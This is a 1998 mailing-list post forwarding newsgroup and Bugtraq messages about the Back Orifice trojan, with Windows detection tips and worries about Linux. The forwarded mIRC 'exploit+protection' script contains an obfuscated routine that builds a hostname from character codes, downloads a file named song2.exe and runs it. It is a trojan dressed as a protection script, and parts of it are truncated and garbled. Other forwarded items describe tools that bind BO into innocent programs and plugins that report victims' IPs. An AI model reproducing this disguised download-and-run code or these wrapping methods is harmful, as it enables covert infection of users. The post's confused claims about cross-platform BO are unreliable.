Could Linux be at risk from the “Back Orifice” Windows trojan?

[email protected]” has submitted to the
[email protected]” mailing list his concerns about this trojan
coming into Linux Land.

———- Forwarded message ———-
From: [email protected]
To: [email protected]

Dear all,

This is a message about the Back Orifice (BO) trojan. Included
in this message are several BO-related messages I obtained from the
various *crack* newsgroups, and one from the Bugtraq

At first I thought BO only wrack havoc on the Windoze platform,
— please read the first forwarded message, — but on the bugtraq
list, someone demonstrated that BO is alive and well on the BSD and
Linux platforms as well, — please read the second forwarded
message, from Bugtraq maillist. I also included clips of other
BO-related messages to give you a clearly perspective of BO.

I have several concerns:

  1. The LGPL license, if I am not mistaken, does allow the
    distribution of compiled libraries. The possibility of someone
    hiding a BO trojan and distribute it under the LGPL license must
    _NEVER_ be discounted.
  2. Call me a paranoid if you must, but the “Halloween Papers”
    exposed the possibility of Microsoft employing all kinds of dirty
    tricks in wracking Linux. Hence, in addition to the usual FUD
    tactics, it is _NOT_ inconceivable that some determined fanatics
    from the Windoze camp may actually carry out what I have just
    mentioned above.
  3. If that happened, what should we, the people from the Linux
    community do?
  4. Are there any precautions we can take in advance to prevent
    that from happening?
  5. Not all of us are security experts, so it may be too much to
    ask all Linux users to scan all the ports of their machines. Are
    there any security programs in existence that can help the Linux
    users in preventing the BO trojan from infecting our machines?
  6. Linux are being employed in more and more businesses. The BO
    trojan allows someone from the outside to monitor and scan the
    infected machines, and if the infected machines are being used for
    business purposes, trade secrets and business strategies may be
    seriously compromised. If we are to promote the use of Linux in the
    business premises, we must take a pro-active stance in finding ways
    to counter any possible effect of the BO trojan.


I am _NOT_ a cracker, I do _NOT_ own nor will knowingly run any
of the below mention programs. I am _NOT_ affiliated with any of
the people and/or organization mentioned below either.

I have no way to know, and I haven’t have the time to prove the
validity of the information I’m including below. I apologize in
advance if all these seem unimportant or if anything resembling
were ever posted in the past.

Please also take into consideration that most of the BO-related
messages were from the various *.crack* newsgroups populated by
boastful teenage script-runners. Some of the language they use are
offensive in nature, so please stop reading any further if you are
easily offended.

Thank You.

[email protected]

- -------------------------------------------------------------
A forwarded message about the nature of the Back Orifice Trojan
- -------------------------------------------------------------

From: [email protected] (Jim Porter)
Subject: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!!
Date: Wed, 09 Sep 1998 12:27:32 GMT
Message-ID: <[email protected]
NNTP-Posting-Host: s02.zwolle.bart.nl

                        Back Orifice News

First, It seems that I'm getting a lot of questions from people who don't know
what Back Orifice is about... and the rest probably don't care... or think they
don't care about whatever it is. Back Orifice is a program that will let people
who don't have a clue about hacking get into YOUR computer and do ANYTHING they
want. They can access all your banking/accounting records, credit card info,
read your ICQ history, irc logs, your email (including received and sent and
undeleted trash mail), they can get all the passwords to your ftp sites and
websites, if you are running on
a network they can move to all the other systems and modify anything, copy
anything, upload anything AND destroy anything.  A hacker can even keep a log of
your keystrokes and take a snapshot of what you are viewing on your screen and
take a look.

You probably think... oh I won't get it on my computer because I'm careful. Well
ok then.. read no farther.  

You may not know that BO is showing up EVERYWHERE, in programs like greeting
cards, jokes, cracks, something you may get in
email and just click on, and it can even be loaded from browsing a web site. You
might go to a site that simply says "We have moved.. click HERE to go to our new
location." and a Java app. will load BO from there onto your system.  There was
a web site that had and example but it looks like Microsoft had them take it
down. If I find another one I'll mention the url.

Personally, I have to admit that I didn't think Back Orifice would be such a big
deal. After all, you have to execute a program on your computer that has BO in
it, and it should be easy to detect it when it's running.  HOWEVER, I've found
SEVERAL really trick versions that are wrapped up in programs we are all likely
to encounter. And after reading so many articles about BO on the web I have a
strong sense that they just think
this is a minor nuisance and can be eliminate by watching the default port,
and/or checking the register where it normally loads. I say "ha,ha" 

                      Consider these facts:

* Some versions of BO are modified so they are NOT detected by Norton or the
normal detection programs that claim to detect it.

* There are BO support sites that offer programs that will wrap BO into any
application and various other innovative utilities to help get it onto someone's
system without them knowing.

And there are programs that will plug into BO so that it will email the hacker
who prepared the version you are installing and tell him/her "BO has been
installed at: Your IP number"  so they know your system is open for the hacker's

* Even if you run a BoWatch type program, they can take up to 10 mins to
identify and turn off BO.. which gives someone who is watching your system (or
who has just sent it to you wrapped in another program) plenty of time to go
into your system and close then delete the BoWatch program. Of course it would
not be so difficult for a programmer to just check for the "anti-BO" programs
and deactivate then, or replace them with a version that doesn't work.. so you
would have the "false security" of thinking you were protected when you see the
"do nothing" program running.

See this story:  Back Orifice "security" tools miss the mark

The main problem with removing it is that it may be "hatched" when your system
starts, meaning that another program is putting a new copy on a system during
bootup. Often these BO removal programs think they cured your system but haven't
fixed anything.  Most just check the default location in your system's register
or watch the default port setting.  

One way to detect if it's running on your system is to enter this command from
your  Start /Run menu you can see if you have anyports in the 3,000's open.  If
you do, most likely that is BO running. BO's default address is 31377. command
/k netstat -n (this doesn't seem to show up if you have a password version of BO
unless the person who knows the password is on your computer)

Another thing you can do is click on Start / Find  / Files and put
"bofilemapping"  (without the quotes) in the "Containing Text" field.  Any
matches you find have the BO trojan. If they are in your windowssystem
directory it is probably running. I have been told that you can be running
several versions at the same time.

Run Regedit and look in here:

Then check under "Run" "Runonce" for files like windll.dll (the default name the
unmodified version of BO uses) or hello.abc There are some very clever people
out there that make it lookVERY important if you are looking at your register.
It may say "Key file for Windows System Tray, do not delete" There are even MORE
clever tricks that I don't want to mention here.

Another thing that can help you protect your data from BO access is to take
advantage of the limitation that BO can't change to a  directory with an ALT +
255 character in the name. This means that if you drop to DOS and type MD
hidden  and after the "h" of hidden you hold your alt key and press 255 on your
number pad, when you release your ALT key your cursor moves to the right one
space.  If you try to access this directory from Windows Explorer (or with BO)
it will look like  "hidden_"  but if you try to see the files in that directory
you will get an error message, saying
something like this directory has been moved or deleted. The only way you can
move files into and out of this directory is from DOS.  You can use dos based
file managing programs like List and DirMagic to access this directory so you
don't have to type out all the file names. I haven't had time to experiment yet,
but I'm hoping that Netscape will allow me to configure it to use a directory
with alt + 255 in the name of the mail file.

Note:  If you have contacts with the cDc people, please try to get the source
code for this program for me. If you have any really good tips about BO let's
share the info that I can't (or just don't want to) talk about in this
newsletter.  If you have found or created any modified versions  of your own
that the scanners don't detect, please send them to me:
mailto:[email protected]?subject=BOserver If you think you can write a program..
like Nuke Nabber.. that will detect the ip of the BO CLIENT when someone sweeps
or connects to the boserver running on a system, I want to help you test it.

- -----------------------------------------------------------------------
A forwarded Bugtraq message, proving the existence of a cross-platform BO
- -----------------------------------------------------------------------

Message-ID: <[email protected]>
Date: Fri, 13 Nov 1998 14:50:32 -0500
From: System Administrator 
To: [email protected]

while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been
notified of this but we didn't receive a response... my exploit+protection
scri$is included. Expect more mirc stuff from us.


--- cut here ---

;#; mIRC v5.41 hack protection & exploit by FeaRStorm 
;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script
based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt
(ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this
;#;   if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
$6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me |

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
.sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+
$+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+
$c$  .sockwrite -n protx

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  unset %xinprog
  unset %xfilename
  unset %xlof
  unset %xfirst

--- cut here ---

- -------------------------------------------------
A forwarded message regarding BO and its port usage
- -------------------------------------------------

From: [email protected] (Nitallica)
Subject: Re: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning
Organization: Phrozen Crew 
Date: Wed, 09 Sep 1998 13:51:52 GMT
Reply-To: [email protected]
Message-ID: <[email protected]>
NNTP-Posting-Host: host-209-214-105-195.bhm.bellsouth.net

On 9 Sep 1998 13:41:49 GMT, "Wolfsbane" 
writhed in pain while screaming:

>Ok, here's my question:
>Even if I did happen to get the BO Server on my computer, would McAfee
>PCFirewall protect me from anybody trying to get on my computer?

only if you have it configured to block every port.

BO typically uses port 31337, unless specified otherwise.

da GothiC AngeL
Phrozen Crew '98
Phrozen 4 Life

- --------------------------------------------------------
Forwarded quotes about various BO-related programs/trojans
- --------------------------------------------------------

Speakeasy (v0.1 beta), 31Kb -- DLL, instructions, and C source code Speakeasy is
a ButtPlug that attempts to log into a predetermined IRC server on channel
#BO_OWNED with a random username. It then proceeds to announce its IP address
and a custom message every few minutes. This plugin is still in beta, and still
missing a few features--mainly the ability to reestablish a link to the server
when the connection is dropped, the ability to cope with being kicked out of a
channel, and some assorted error checking/handling. Experiment with it, if you

Silk Rope (v2.0), 41Kb -- EXE, instructions, and C source code This is a little
bit more of an elegant and sophisticated wrapper for the BO installer. (I prefer
Silk Rope to Saran Wrap, myself...you know, a little more comfortable, a little
less hot). Silk Rope binds your BO installer with a program of your choosing,
saving the result as a single file. Great for modifying single-file installs.
Presently, the icon is the generic single-file-install icon (an opening box with
a window in the background), but I am working on making it "steal" the icon from
the original executable. For now, you can change it with an icon utility such as

NEW IN THIS VERSION: Install/Infect Redesign--the installer (used to trojan-ize
an existing EXE) has been internally modified and greatly simplified. NEW IN
PREVIOUS VERSION: Windows NT detection--the BO installer is not run if NT is
detected (so that the nasty "password enumeration" error dialog box does not pop
up). Simple Encryption--the BO installer is embedded into the EXE file using
simple crypography (with a random 8-bit key)

Saran Wrap (v1.1), 18Kb -- EXE, instructions, and C source code A simple wrapper
that will first install BO, then run an application of your choosing. I have
heard that someone at CDC or the l0pht have something like this in the works,
but I decided to release my own (with source code). The program's icon is the
generic setup icon, but can be changed with an icon utility such as Microangelo.

Butt Trumpet (v1.1), 40Kb -- DLL, instructions, and C source code Upon
activation, this plugin will fire off an email to a predetermined SMTP server
and email address (for instance, an anonymous remailer or a web-based email
server). This way, victims could be infected via Usenet, without any knowledge
ahead of time of who is being infected. The computer attempts to send an email
message every 5 minutes until successful (for instance, if the user connects
through dialup networking, their network may not have a valid internet
connection when their computer first boots up). Once the message is successfully
sent, a flag is set in the registry so that it is never sent again.

- ----------------------------------------------------------
Forwarded quotes regarding possible (windoze) anti-BO proggy
- ----------------------------------------------------------

There is a website www.groupaxion.com that has a downloadable file that
seeks and eliminates back orifice.

Download AVP at www.avp.com and it will get rid of BO and NETBUS and some other

- -------------------------------------------------------------
Name of a lamely disguised BO trojan, downloadable from the Net
- -------------------------------------------------------------


- ------------------
End forwarded quotes
- ------------------